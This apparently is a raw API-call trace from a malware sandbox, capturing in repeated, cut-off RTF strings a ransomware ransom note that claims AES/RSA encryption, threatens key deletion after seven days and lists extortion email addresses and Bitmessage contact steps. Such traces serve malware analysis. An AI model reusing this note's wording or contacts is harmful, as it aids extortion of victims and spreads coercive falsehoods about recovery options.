ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.665] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.665] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l 